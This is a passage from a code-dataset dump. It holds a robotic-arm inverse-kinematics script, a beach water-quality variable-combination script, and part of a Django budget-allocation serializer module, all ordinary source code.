DH[3,3] ],\r\n [0, 0, 0, 1 ]])\r\n\r\n H4_5 = Matrix([[cos(DH[4,0]), -sin(DH[4,0])*cos(DH[4,1]), sin(DH[4,0])*sin(DH[4,1]), DH[4,2]*cos(DH[4,0])],\r\n [sin(DH[4,0]), cos(DH[4,0])*cos(DH[4,1]), -cos(DH[4,0])*sin(DH[4,1]), DH[4,2]*sin(DH[4,0])],\r\n [0, sin(DH[4,1]), cos(DH[4,1]), DH[4,3] ],\r\n [0, 0, 0, 1 ]])\r\n\r\n H5_6 = Matrix([[cos(DH[5,0]), -sin(DH[5,0])*cos(DH[5,1]), sin(DH[5,0])*sin(DH[5,1]), DH[5,2]*cos(DH[5,0])],\r\n [sin(DH[5,0]), cos(DH[5,0])*cos(DH[5,1]), -cos(DH[5,0])*sin(DH[5,1]), DH[5,2]*sin(DH[5,0])],\r\n [0, sin(DH[5,1]), cos(DH[5,1]), DH[5,3] ],\r\n [0, 0, 0, 1 ]])\r\n\r\n H0_6 = H0_1*H1_2*H2_3*H3_4*H4_5*H5_6\r\n print(H0_6)\r\n\r\n print(H0_1)\r\n print(H1_2)\r\n print(H2_3)\r\n print(H3_4)\r\n print(H4_5)\r\n print(H5_6)\r\n\r\n # rotation matrices\r\n R0_1 = H0_1[:3, :3]\r\n R0_2 = R0_1*H1_2[:3, :3]\r\n R0_3 = R0_2*H2_3[:3, :3]\r\n R0_4 = R0_3*H3_4[:3, :3]\r\n R0_5 = R0_4*H4_5[:3, :3]\r\n R0_6 = R0_5*H5_6[:3, :3]\r\n print(R0_1)\r\n print(R0_2)\r\n print(R0_3)\r\n print(R0_4)\r\n print(R0_5)\r\n print(R0_6)\r\n\r\n R36 = H3_4[:3, :3]*H4_5[:3, :3]*H5_6[:3, :3]\r\n print(R36)\r\n\r\n\r\ndef get_cosine_law_angle(a, b, c):\r\n # given all sides of a triangle a, b, c\r\n # calculate angle gamma between sides a and b using cosine law\r\n\r\n gamma = np.arccos((a*a + b*b - c*c) / (2*a*b))\r\n\r\n return gamma\r\n\r\n\r\ndef griperCenter(px, py, pz, R06):\r\n # calculating griper center, see in arm diagram for detail\r\n Xc = px - a5*R06[0,2]\r\n Yc = py - a5*R06[1,2]\r\n Zc = pz - a5*R06[2,2]\r\n return Xc, Yc, Zc\r\n\r\n\r\ndef calcFirst3Angles(Xc, Yc, Zc):\r\n # doing inverse kinematics on first 3 dof the reach the center of griper\r\n # see the calculation page of inverse kinematics for more details\r\n\r\n q1 = np.arctan2(Yc, Xc)\r\n\r\n r1 = np.sqrt(Xc**2 + Yc**2)\r\n r2 = np.sqrt((r1-a2)**2 + (Zc-a1)**2)\r\n\r\n phi1 = 
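np.arctan2(Zc - a1, r1 - a2) # added hedged note: an arctan2 form of the expression below;\r\n # it keeps the correct quadrant and avoids a zero division when r1 == a2.\r\n # The script's original expression follows and is the value actually used:\r\n phi1 = 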
np.arctan((Zc-a1)/(r1-a2))\r\n phi2 = get_cosine_law_angle(a3, r2, a4)\r\n q2 = phi1 + phi2\r\n\r\n phi3 = get_cosine_law_angle(a3, a4, r2)\r\n q3 = phi3 - np.pi\r\n\r\n return q1, q2, q3\r\n\r\n\r\ndef calcLast3Angles(R36):\r\n # evaluating last 3 angles by comparing the matrices\r\n # R36 = Matrix([[-sin(q4)*sin(q6) + cos(q4)*cos(q5)*cos(q6), -sin(q4)*cos(q6) - sin(q6)*cos(q4)*cos(q5), sin(q5)*cos(q4)],\r\n # [sin(q4)*cos(q5)*cos(q6) + sin(q6)*cos(q4), -sin(q4)*sin(q6)*cos(q5) + cos(q4)*cos(q6), sin(q4)*sin(q5)],\r\n # [-sin(q5)*cos(q6) , sin(q5)*sin(q6) , cos(q5)]])\r\n\r\n q4 = np.arctan2(R36[1,2],R36[0, 2])\r\n\r\n q5 = np.arccos(R36[2,2])\r\n\r\n q6 = np.arctan2(R36[2,1],-R36[2,0])\r\n return q4, q5, q6\r\n\r\n\r\ndef get_angles(px, py, pz, beta, alpha, gama):\r\n\r\n # the frame of griper is pre-rotated from bellow rotation matrix\r\n R6a = [[0, 0, 1.0], [0, -1.0, 0], [1.0, 0, 0]]\r\n\r\n # after rotation of pitch, roll, yaw\r\n R6b = [[np.cos(alpha)*np.cos(beta), np.sin(alpha)*np.sin(gama) - np.sin(beta)*np.cos(alpha)*np.cos(gama), np.sin(alpha)*np.cos(gama) + np.sin(beta)*np.sin(gama)*np.cos(alpha)],\r\n [np.sin(beta) , np.cos(beta)*np.cos(gama) , -np.sin(gama)*np.cos(beta)],\r\n [-np.sin(alpha)*np.cos(beta), np.sin(alpha)*np.sin(beta)*np.cos(gama) + np.sin(gama)*np.cos(alpha), -np.sin(alpha)*np.sin(beta)*np.sin(gama) + np.cos(alpha)*np.cos(gama)]]\r\n # total rotation of griper frame WRT ground frame\r\n R06 = np.dot(R6a,R6b)\r\n # print(np.matrix(R06))\r\n\r\n # calculating center of griper\r\n Xc, Yc, Zc = griperCenter(px, py, pz, R06)\r\n\r\n # calculating first 3 angles\r\n q1, q2, q3 = calcFirst3Angles(Xc, Yc, Zc)\r\n\r\n # rotation matrix of 3 wrt 0 frame see the calculation sheet for more understanding\r\n R03 = [[-np.sin(q2) * np.cos(q1) * np.cos(q3) - np.sin(q3) * np.cos(q1) * np.cos(q2), np.sin(q1), -np.sin(q2) * np.sin(q3) * np.cos(q1) + np.cos(q1) * np.cos(q2) * np.cos(q3)],\r\n [-np.sin(q1) * np.sin(q2) * np.cos(q3) - np.sin(q1) * np.sin(q3) * np.cos(q2), -np.cos(q1), -np.sin(q1) * np.sin(q2) * np.sin(q3) + np.sin(q1) * np.cos(q2) * np.cos(q3)],\r\n [-np.sin(q2) * np.sin(q3) + np.cos(q2) * np.cos(q3), 0, np.sin(q2) * np.cos(q3) + np.sin(q3) * np.cos(q2)]]\r\n\r\n IR03 = np.transpose(R03)\r\n\r\n R36 = np.dot(IR03, R06)\r\n\r\n q4, q5, q6 = calcLast3Angles(R36)\r\n\r\n return q1, q2, q3, q4, q5, q6\r\n\r\n\r\ndef main():\r\n\r\n # printMatrices()\r\n\r\n # position of end effector\r\n px, py, pz = 5.0, 1.0, 1.0\r\n # value of orientation of the end effector\r\n roll, pitch, yaw = 0, 0, 0\r\n\r\n q1, q2, q3, q4, q5, q6 = get_angles(px, py, pz, roll, pitch, yaw)\r\n\r\n print(\"q1 : \", q1)\r\n print(\"q2 : \", q2)\r\n print(\"q3 : \", q3)\r\n print(\"q4 : \", q4)\r\n print(\"q5 : \", q5)\r\n print(\"q6 : \", q6)\r\n\r\n # to check the output\r\n X, Y, Z = forward_kin(q1, q2, q3, q4, q5, q6)\r\n print(\"X : \", X[0, 7])\r\n print(\"Y : \", Y[0, 7])\r\n print(\"Z : \", Z[0, 7])\r\n\r\n fig, ax = create_plot()\r\n update_plot(X, Y, Z, X, Y, Z, fig, ax)\r\n plt.show()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","repo_name":"puru2411/Robotic-arm-3-and-6-dof","sub_path":"6dof/invkin_puru.py","file_name":"invkin_puru.py","file_ext":"py","file_size_in_byte":14137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"8805399197","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nvars_combo.py\nCreated on Wed Jan 8 19:37:57 2020\n\n@author: rtsearcy\n\nUpdate 2022\n\nCombine FIB and EV 
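(fecal indicator bacteria / environmental variable) 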
datasets into a single dataframe for a given beach\n- Calculate beach-specific variables\n\n\"\"\"\n\nimport pandas as pd\nimport os\nimport numpy as np\nfrom numpy import sin, cos, pi, isnan, nan, log10\n\n#%% Inputs + Load Data\nfolder = '/Volumes/GoogleDrive/My Drive/water_quality_modeling/forecasting'\nbeach = 'HSB3N'\n\nsd = '2000-01-01' # dates of dataset\ned = '2021-12-31'\n\nFIB = {'EC':400, \n 'ENT': 104}\n\n### Lag vars list\nlag_range = range(1,6)\nlag_vars = [\n 'tide_max','tide_min','tide_range',\n 'logflow', 'upwell','upwell_bin',\n 'WVHT','APD','DPD','wtemp_b','WVHT_q75','DPD_q75',\n 'logchl','logturb','cond','DO','wtemp','chl_q75','turb_q75',\n 'along','cross','cross_bin','along_bin','current_mag','along_mag','cross_mag',\n 'atemp','atemp_min','dtemp','rad','relhum',\n 'wspd','gust','awind','owind','wspd_q75', 'owind_bin', 'awind_bin'\n ]\n \n\n### FIB Data\nfib_file = os.path.join(folder, \n 'beach', \n beach.replace(' ','_'), \n 'variables', \n 'FIB_variables_' + beach.replace(' ','_') + '.csv')\nfib = pd.read_csv(fib_file, index_col=['date'], parse_dates=['date'])\nfib.drop(['sample_time'], axis=1, inplace=True)\n\nfib['year'] = fib.index.year\nfib['month'] = fib.index.month\nfib['doy'] = fib.index.dayofyear # Day of Year\nfib['dow'] = fib.index.dayofweek # Monday=0, Sunday=6\nfib['weekend'] = (fib.dow.isin([6,5,4])).astype(int)\nfib['weekend1'] = (fib.dow.isin([0,6,5])).astype(int)\n\nprint(beach)\nprint('\\nFIB (N=' + str(len(fib)) + ', ' + str(fib.index.year.min()) + '-' + str(fib.index.year.max()) + ')\\nMissing:')\nprint(fib.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\n\n### Load Enviro. Variables\nstations = pd.read_csv(os.path.join(folder,'beach','beach_env_stations.csv'), index_col='beach')\nstations = stations.loc[beach]\nangle = stations['angle'] # Cowell - 135, MB - \n\n## Flow\ntry:\n s = [s for s in os.listdir(os.path.join(folder,'data/flow/')) if stations.flow.replace(' ','_') in s][0]\n flow = pd.read_csv(os.path.join(folder,'data/flow/',s), parse_dates=['date'], index_col=['date'])\n\n print('\\nFlow (N=' + str(len(flow)) + ', ' + str(flow.index.year.min()) + '-' + str(flow.index.year.max()) + ')\\nMissing:')\n print(flow.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\nexcept:\n flow = pd.DataFrame()\n\n## Tide\ns = [s for s in os.listdir(os.path.join(folder,'data/tide/')) if stations.tide.replace(' ','_') in s][0]\ntide = pd.read_csv(os.path.join(folder,'data/tide/',s), parse_dates=['date'], index_col=['date'])\n\nprint('\\nTide (N=' + str(len(tide)) + ', ' + str(tide.index.year.min()) + '-' + str(tide.index.year.max()) + ')\\nMissing:')\nprint(tide.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\n\n## Upwelling\ns = [s for s in os.listdir(os.path.join(folder,'data/upwelling/')) if stations.upwell.replace(' ','_') in s][0]\nupwell = pd.read_csv(os.path.join(folder,'data/upwelling/',s), parse_dates=['date'], index_col=['date'])\n\nprint('\\nUpwelling (N=' + str(len(upwell)) + ', ' + str(upwell.index.year.min()) + '-' + str(upwell.index.year.max()) + ')\\nMissing:')\nprint(upwell.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\n\n## Waves\ns = [s for s in os.listdir(os.path.join(folder,'data/waves/')) if stations.waves.replace(' ','_') in s][0]\nwave = pd.read_csv(os.path.join(folder,'data/waves/',s), parse_dates=['dt'], index_col=['dt'])\nwave.index.name = 'date'\n\nwave['WVHT_q75'] = (wave.WVHT > 
wave.WVHT.quantile(.75)).astype(int)\nwave.loc[wave.WVHT.isna(),'WVHT_q75'] = np.nan\nwave['DPD_q75'] = (wave.DPD > wave.DPD.quantile(.75)).astype(int)\nwave.loc[wave.DPD.isna(),'DPD_q75'] = np.nan\n\nprint('\\nWave (N=' + str(len(wave)) + ', ' + str(wave.index.year.min()) + '-' + str(wave.index.year.max()) + ')\\nMissing:')\nprint(wave.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\n\n## Water Quality\ns = [s for s in os.listdir(os.path.join(folder,'data/water_quality/CenCOOS')) if stations.wq.replace(' ','_') in s][0]\nwq = pd.read_csv(os.path.join(folder,'data/water_quality/CenCOOS',s), index_col=['dt'], parse_dates=['dt'])\nwq.index = wq.index.date\nwq.index = wq.index.astype('datetime64[ns]')\nwq.index.name = 'date'\n\nfor c in ['chl','turb']:\n if c not in wq.columns:\n continue\n wq['log'+c] = np.log10(wq[c]+1)\n wq[c+'_q75'] = (wq[c] > wq[c].quantile(.75)).astype(int)\n wq.loc[wq[c].isna(),c+'_q75'] = np.nan\n\nprint('\\nWater Quality (N=' + str(len(wq)) + ', ' + str(wq.index.year.min()) + '-' + str(wq.index.year.max()) + ')\\nMissing:')\nprint(wq.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\n\n## Currents\ntry:\n s = [s for s in os.listdir(os.path.join(folder,'data/currents/')) if stations.currents.replace(' ','_') in s][0]\n currents = pd.read_csv(os.path.join(folder,'data/currents/',s), index_col=['dt'], parse_dates=['dt'])\n currents.index.name = 'date'\n \n currents.drop(['lat','lon'], axis=1, inplace=True)\n \n currents['current_mag'] = np.sqrt((currents.u**2) + (currents.v**2))\n currents['current_q75'] = (currents['current_mag'] > currents['current_mag'].quantile(.75)).astype(int)\n currents.loc[currents['current_mag'].isna(),'current_q75'] = np.nan\n \n currents['cross_bin'] = np.nan\n currents.loc[currents.cross > 0,'cross_bin'] = 1\n currents.loc[currents.cross < 0,'cross_bin'] = 0\n \n currents['cross_mag'] = currents.cross.abs()\n \n currents['along_bin'] = np.nan\n currents.loc[currents.along > 0,'along_bin'] = 1\n currents.loc[currents.along < 0,'along_bin'] = 0\n \n currents['along_mag'] = currents.along.abs()\n \n print('\\nCurrents (N=' + str(len(currents)) + ', ' + str(currents.index.year.min()) + '-' + str(currents.index.year.max()) + ')\\nMissing:')\n print(currents.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\n \nexcept:\n currents = pd.DataFrame()\n\n## Met\nmet = pd.read_csv(stations.met, parse_dates=['date'], index_col=['date'])\n\n# Note: CIMIS data do not include wind direction...taking wind from other station\nwind = pd.read_csv(stations.wind, parse_dates=['dt'], index_col=['dt'])# download hourly data\nwind['awind'] = wind['wspd'] * round(np.sin(((wind['wdir'] - angle) / 180) * np.pi), 1)\nwind['owind'] = wind['wspd'] * round(np.cos(((wind['wdir'] - angle) / 180) * np.pi), 1)\nwind = wind.resample('1D').mean()\nwind.index = wind.index.date\nwind.index.name = 'date'\nwcols = ['gust','wspd','awind','owind']\nwind = wind[[c for c in wcols if c in wind.columns]]\nwcols = wind.columns\n# for i in [1,2,3]:\n# wind[[c+str(i) for c in wcols]] = wind[wcols].shift(i) # lags\n\nmet.drop([c for c in wcols if c in met.columns],axis=1, inplace=True)\nmet = pd.concat([met,wind], axis=1)\n\nmet['wet'] = ((met['rain'] + met['rain3T']) > 0.1*25.4).astype(int) # greater than .1 in (in mm)\n \nmet['wspd_q75'] = (met.wspd > met.wspd.quantile(.75)).astype(int)\nmet.loc[met['wspd'].isna(),'wspd_q75'] = np.nan\nmet['owind_bin'] = (met.owind > 0).astype(int)\nmet.loc[met['owind'].isna(),'owind_bin'] = 
np.nan\nmet['awind_bin'] = (met.awind > 0).astype(int)\nmet.loc[met['awind'].isna(),'awind_bin'] = np.nan\n\nprint('\\nMet (N=' + str(len(met)) + ', ' + str(met.index.year.min()) + '-' + str(met.index.year.max()) + ')\\nMissing:')\nprint(met.isna().sum().sort_values(ascending=False).replace(0,np.nan).dropna())\n\n\n### Combine into ENV dataframe\nenv = pd.concat([met, wq, tide, wave, upwell, currents, flow], axis=1)\n\n#%% Lag Variables\nassert len(env) == len(pd.date_range(env.index[0],env.index[-1])), 'EVs not continuous time series'\n\n### EVs (except rain)\nfor v in lag_vars:\n if v not in env:\n continue\n \n for i in lag_range:\n if v[-1].isalpha():\n var_name = v+str(i)\n else:\n var_name = v + '_' + str(i)\n \n env[var_name] = env[v].shift(i)\n \n### Rain (shift-lag totals)\n# Rain totals between \"lag_start\" and \"lag_start\"+\"lag_shift\" days ago\nlag_start = range(1,6) \nlag_shift = [2,3,5,7,14,30]\n\nrain = met.rain.copy()\nassert len(rain) == len(pd.date_range(rain.index[0],rain.index[-1])), 'rain df not continuous time series'\n\nfor i in lag_start:\n for s in lag_shift:\n var_name = 'lograin' + str(i) + '_' + str(i+s-1) + 'T'\n \n temp = rain.copy().shift(i)\n for j in range(1,s):\n temp += rain.copy().shift(i+j)\n \n env[var_name] = np.log10(temp + 1)\n \n \n#%% Combine and Save\n#df = pd.merge(fib, env, how='left', left_index=True, right_index=True) # index of FIB obs days only\ndf = pd.concat([fib, env], axis=1) # index is ALL days in range\ndf.sort_index(ascending=True, inplace=True)\ndf = df[sd:ed]\n\nout_file = os.path.join(folder, 'beach', beach.replace(' ','_'), 'variables', beach.replace(' ','_') + '__variables.csv')\ndf.to_csv(os.path.join(out_file))\n\nprint('Beach - ' + beach)\nprint('N - ' + str(len(df)))\nprint('Cols - ' + str(len(df.columns)) +'\\n')\nprint(df.columns)\n","repo_name":"rtsearcy/wq-forecasting","sub_path":"modeling/vars_combo.py","file_name":"vars_combo.py","file_ext":"py","file_size_in_byte":9228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8361097277","text":"from functools import reduce\n\nfrom budget.models import (\n AllocationsDetail,\n DDOWiseAllocations,\n LCAmountVariationRemark,\n LCAuthorizationRequest,\n LcAuthRequestStatus,\n LCDetail,\n MileStone,\n MileStoneScroll,\n PaoBudget,\n ShortCodeBudget,\n ShortCodeBudgetAllocation,\n TransferBudget,\n)\nfrom budget.serializers import (\n AccountVariationRemarkSerializer,\n AllocationsDetailSerializer,\n)\nfrom budget.utils import get_short_code_available_balance\nfrom compilation.models import (\n Challan,\n Entry,\n PaymentClassificationScroll,\n ReceiptScrollClassification,\n ReceiptScrollStatus,\n TEClassification,\n TEStatus,\n TransferEntry,\n)\nfrom django.db.models import Sum\nfrom master.models import (\n FunctionalHeadMaster,\n ObjectHeadMaster,\n ShortCodeMapping,\n SubHead,\n)\nfrom master.serializers import (\n BankDetailListSerializer,\n CreateBranchSerializer,\n DDOMasterSerializerCodeList,\n PaoMasterCodeListSerializer,\n ShortCodeGetSerializer,\n)\nfrom pre_check.models import (\n BudgetOverride,\n PCBillClassification,\n PCBillPass,\n PCChequeDetail,\n)\nfrom rest_framework import serializers\n\nfrom .utils import (\n get_object_head,\n get_object_head_allocation_detail,\n get_short_code,\n get_sub_head,\n head_wise_ddo_wise_budget_allocation_and_balance,\n total_object_head_expenditure_ddo_wise,\n)\n\n\nclass CommonFinancialYearSerializer(serializers.Serializer):\n \"\"\"\n This serializer is used to 
provide common financial year.\n \"\"\"\n\n financial_year = serializers.CharField()\n\n\nclass TestToken(serializers.ModelSerializer):\n token = serializers.SerializerMethodField(\"get_token\")\n\n class Meta:\n model = PCBillPass\n fields = [\"pass_amount\", \"token\"]\n\n def get_token(self, obj):\n return obj.token\n\n\nclass BudgetOverridingSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to provide budget override detail.\n \"\"\"\n\n function_head = serializers.CharField(\n source=\"budget_allocation.short_code_mapping.functional_head_matrix.function_head_master.function_head\"\n )\n object_head = serializers.CharField(\n source=\"budget_allocation.short_code_mapping.functional_head_matrix.objects_heads.description\"\n )\n sub_head = serializers.CharField(\n source=\"budget_allocation.short_code_mapping.functional_head_matrix.sub_head.description\",\n required=False,\n )\n category_override = serializers.CharField(\n source=\"budget_allocation.short_code_mapping.functional_head_matrix.category_master.code\"\n )\n ddo_code = serializers.CharField(source=\"budget_allocation.ddo_master.code\")\n ddo_description = serializers.CharField(\n source=\"budget_allocation.ddo_master.description\"\n )\n token_number = serializers.IntegerField(source=\"token.number\", required=False)\n transfer_entry_number = serializers.SerializerMethodField(\"get_te_number\")\n date = serializers.DateTimeField(source=\"created_at\", format=\"%d-%m-%Y\")\n pass_amount = serializers.FloatField(source=\"budget_after_override\")\n\n budget_balanced = serializers.DecimalField(\n max_digits=19, decimal_places=2, source=\"budget_balance\", required=False\n )\n\n class Meta:\n model = BudgetOverride\n fields = (\n \"date\",\n \"function_head\",\n \"object_head\",\n \"sub_head\",\n \"category_override\",\n \"ddo_code\",\n \"ddo_description\",\n \"token_number\",\n \"transfer_entry_number\",\n \"pass_amount\",\n \"budget_balanced\",\n \"override_amount\",\n )\n\n @staticmethod\n def get_te_number(inst):\n return (\n TEClassification.objects.filter(\n ddo__public_id=inst.budget_allocation.ddo_master.public_id,\n short_code__public_id=inst.budget_allocation.short_code_mapping.public_id,\n amount=inst.budget_after_override,\n operation=\"-\",\n )\n .filter(\n te__id__in=TransferEntry.objects.filter(\n status_on_te__in=TEStatus.objects.filter(\n status=\"Pass\", user_type=\"AAO\"\n )\n )\n )\n .last()\n .te.number\n if TEClassification.objects.filter(\n ddo__public_id=inst.budget_allocation.ddo_master.public_id,\n short_code__public_id=inst.budget_allocation.short_code_mapping.public_id,\n amount=inst.budget_after_override,\n operation=\"-\",\n ).filter(\n te__id__in=TransferEntry.objects.filter(\n status_on_te__in=TEStatus.objects.filter(\n status=\"Pass\", user_type=\"AAO\"\n )\n )\n )\n else \"TE_Not_Pass_AAO\"\n )\n\n\nclass LcReportSerializer(serializers.Serializer):\n \"\"\"\n Serializer is used to provide lc_type and ddo_master and detail.\n \"\"\"\n\n # financial_year = serializers.CharField()\n lc_type = serializers.CharField(required=False)\n ddo_master_id = serializers.CharField(required=False)\n lc_date = serializers.DateField(required=False)\n\n\nclass LCDetailSerializerForReport(serializers.ModelSerializer):\n class Meta:\n model = LCDetail\n fields = [\"public_id\", \"lc_number\", \"lc_date\", \"lc_from_period\", \"lc_to_period\"]\n\n\nclass LCAuthorizationRequestReportSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to show lc auth detail report\n 
\"\"\"\n\n pao_master = PaoMasterCodeListSerializer()\n ddo_master = DDOMasterSerializerCodeList()\n short_code_mapping = serializers.SerializerMethodField(\"get_short_code_mapping\")\n bank = BankDetailListSerializer()\n branch = CreateBranchSerializer()\n lc_amount_variation = serializers.SerializerMethodField(\"get_amount_variation\")\n lc_detail = serializers.SerializerMethodField(\"get_lc_detail\")\n scroll = serializers.SerializerMethodField(\"get_scroll_amount\")\n remaining_amount = serializers.SerializerMethodField(\"get_amount_remain\")\n date = serializers.DateField(format=\"%d-%m-%y\")\n\n class Meta:\n model = LCAuthorizationRequest\n fields = [\n \"public_id\",\n \"lc_type\",\n \"auth_letter_no\",\n \"date\",\n \"pao_master\",\n \"lc_amount_variation\",\n \"bank\",\n \"branch\",\n \"ddo_master\",\n \"short_code_mapping\",\n \"budget_balance\",\n \"lc_detail\",\n \"scroll\",\n \"remaining_amount\",\n ]\n\n def get_short_code_mapping(self, obj):\n obj_detail = ShortCodeGetSerializer(\n obj.ddo_wise_allocation.short_code_mapping\n ).data\n\n list(\n map(\n obj_detail.__delitem__,\n filter(obj_detail.__contains__, [\"ddo_master\", \"major\"]),\n )\n )\n obj_detail.update(\n {\"short_codes\": obj.ddo_wise_allocation.short_code_mapping.short_codes}\n )\n return obj_detail\n\n def get_amount_variation(self, obj):\n return AccountVariationRemarkSerializer(\n obj.lc_amount_variation_on_lc_auth_request.filter().last(),\n ).data\n\n def get_lc_detail(self, obj):\n return {\n \"lc_detail\": LCDetailSerializerForReport(\n obj.lc_detail_on_lc_auth_request.filter(), many=True\n ).data,\n }\n\n def get_scroll_amount(self, obj):\n lc = obj.lc_detail_on_lc_auth_request.filter()\n if lc.last() and lc.last().milestone_on_lc_detail.filter():\n scroll_amount = 0\n for milestone in (\n obj.lc_detail_on_lc_auth_request.filter()\n .last()\n .milestone_on_lc_detail.filter()\n ):\n if milestone.scroll_on_milestone.filter():\n scroll_amount = scroll_amount + reduce(\n lambda a, b: a + b,\n [\n float(i[-1])\n for i in milestone.scroll_on_milestone.filter().values_list(\n \"amount\"\n )\n ],\n )\n return scroll_amount\n\n def get_amount_remain(self, obj):\n lc_amount = self.get_amount_variation(obj)\n scroll_amount = self.get_scroll_amount(obj)\n return (\n int(float(lc_amount[\"amount\"])) - 0 if not scroll_amount else scroll_amount\n )\n\n\nclass PaoBudgetSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to provide PAO budget like short code,pao code,description and budget detail.\n \"\"\"\n\n short_code = serializers.CharField(source=\"short_code.short_codes\")\n pao_code = serializers.CharField(source=\"pao_budget.pao.code\")\n pao_description = serializers.CharField(source=\"pao_budget.pao.description\")\n budget_detail = serializers.SerializerMethodField(\"get_available_balance\")\n\n class Meta:\n model = ShortCodeBudget\n fields = (\n \"pao_code\",\n \"pao_description\",\n \"short_code\",\n \"amount\",\n \"budget_detail\",\n )\n\n @staticmethod\n def get_available_balance(obj):\n return get_short_code_available_balance(obj.short_code)\n\n\nclass BudgetAllocationDetailSerializer(serializers.Serializer):\n \"\"\"\n This Serializer created to validate pao budget allocation payload.\n \"\"\"\n\n number = serializers.IntegerField(required=False)\n latter_number = serializers.CharField(required=False)\n date = serializers.DateField(required=False, format=\"%d-%m-%y\")\n budget_type = serializers.CharField(default=\"None\", required=False)\n amount = 
serializers.DecimalField(default=0.00, max_digits=19, decimal_places=2)\n\n\nclass DDOAllocationsDetailSerializer(serializers.ModelSerializer):\n \"\"\"\n This Serializer created to validate pao budget allocation payload.\n \"\"\"\n\n letter_date = serializers.DateField(format=\"%d-%m-%y\")\n\n class Meta:\n model = AllocationsDetail\n fields = (\n \"letter_no\",\n \"letter_date\",\n \"budget_type\",\n \"amount\",\n )\n\n\nclass DDOWiseAllocationBudgetSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to list of short code for ddo wise allocation..\n \"\"\"\n\n detail_description = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.function_head_master.detail.description\"\n )\n function_head = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.function_head_master.function_head\"\n )\n\n short_codes = serializers.CharField(source=\"short_code_mapping.short_codes\")\n\n ddo_code = serializers.CharField(source=\"ddo_master.code\")\n ddo_description = serializers.CharField(source=\"ddo_master.description\")\n\n allocation = serializers.SerializerMethodField(\"get_allocation\")\n\n class Meta:\n model = DDOWiseAllocations\n fields = [\n \"ddo_code\",\n \"ddo_description\",\n \"detail_description\",\n \"short_codes\",\n \"function_head\",\n \"total_amount\",\n \"allocation\",\n ]\n\n @staticmethod\n def get_allocation(inst):\n if inst.total_amount != 0:\n return DDOAllocationsDetailSerializer(\n inst.allocation_detail_on_ddo_wise.filter().last()\n ).data\n return {}\n\n\nclass ShortCodeBudgetAllocationSerializer(serializers.ModelSerializer):\n \"\"\"\n This Serializer created for short code budget detail response.\n \"\"\"\n\n cat_type = serializers.CharField(\n source=\"short_code.functional_head_matrix.category_master.type\"\n )\n short_codes = serializers.CharField(source=\"short_code.short_codes\")\n grant_description = serializers.CharField(source=\"grant.description\")\n allocation = serializers.SerializerMethodField(\"get_allocation\")\n ddo_wise_allocation = serializers.SerializerMethodField(\"get_ddo_wise_allocation\")\n\n class Meta:\n model = ShortCodeBudget\n fields = (\n \"cat_type\",\n \"short_codes\",\n \"grant_description\",\n \"amount\",\n \"allocation\",\n \"ddo_wise_allocation\",\n )\n\n @staticmethod\n def get_sub_head(inst):\n return (\n inst.short_code.functional_head_matrix.sub_head.description\n if inst.short_code.functional_head_matrix.sub_head\n else \"\"\n )\n\n @staticmethod\n def get_allocation(inst):\n if inst.amount != 0.00:\n return BudgetAllocationDetailSerializer(\n inst.allocation_on_short_code_budget.filter().last()\n ).data\n return {}\n\n @staticmethod\n def get_ddo_wise_allocation(inst):\n return DDOWiseAllocationBudgetSerializer(\n inst.short_code.ddo_allocation_on_short_code.filter(), many=True\n ).data\n\n\nclass PaoBudgetAllocationSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer is used to provide budget allocate detail on Pao level\n \"\"\"\n\n pao_id = serializers.IntegerField(source=\"pao.public_id\")\n pao_code = serializers.CharField(source=\"pao.code\")\n pao_description = serializers.CharField(source=\"pao.description\")\n grant_id = serializers.IntegerField(source=\"grant.public_id\")\n grant_number = serializers.CharField(source=\"grant.number\")\n grant_description = serializers.CharField(source=\"grant.description\")\n allocation = serializers.SerializerMethodField(\"get_allocation\")\n short_code_wise = 
serializers.SerializerMethodField(\"get_short_code_head_wise\")\n\n class Meta:\n model = PaoBudget\n fields = (\n \"pao_id\",\n \"pao_code\",\n \"pao_description\",\n \"grant_id\",\n \"grant_number\",\n \"grant_description\",\n \"public_id\",\n \"allocation\",\n \"short_code_wise\",\n \"financial_year\",\n )\n\n @staticmethod\n def get_short_code_head_wise(inst):\n return ShortCodeBudgetAllocationSerializer(\n ShortCodeBudget.objects.filter(\n short_code__functional_head_matrix__category_master__type=\"E-Expenditure\",\n grant=inst.grant,\n ),\n many=True,\n ).data\n\n @staticmethod\n def get_allocation(inst):\n return BudgetAllocationDetailSerializer(\n inst.allocation_on_pao_budget.filter().last()\n ).data\n\n\nclass BudgetDistributedAllocationParamsSerializer(serializers.Serializer):\n \"\"\"\n This Serializer created to validate pao budget allocation payload.\n \"\"\"\n\n financial_year = serializers.CharField()\n pao_id = serializers.IntegerField(source=\"pao__public_id\")\n grant_id = serializers.IntegerField(source=\"grant__public_id\")\n object_head_id = serializers.CharField(\n source=\"short_code__functional_head_matrix__objects_heads__public_id\",\n required=False,\n )\n sub_head_id = serializers.CharField(\n source=\"short_code__functional_head_matrix__sub_head__public_id\", required=False\n )\n\n\nclass ExpenditureControlRegisterParamsSerializer(serializers.ModelSerializer):\n \"\"\"\n This Serializer created to validate expenditure control on ddo master and short code mapping detail.\n \"\"\"\n\n financial_year = serializers.CharField()\n ddo_master_id = serializers.IntegerField(source=\"ddo_master__public_id\")\n short_code_mapping_id = serializers.IntegerField(\n source=\"short_code_mapping__public_id\"\n )\n\n class Meta:\n model = DDOWiseAllocations\n fields = (\"financial_year\", \"ddo_master_id\", \"short_code_mapping_id\")\n\n\nclass 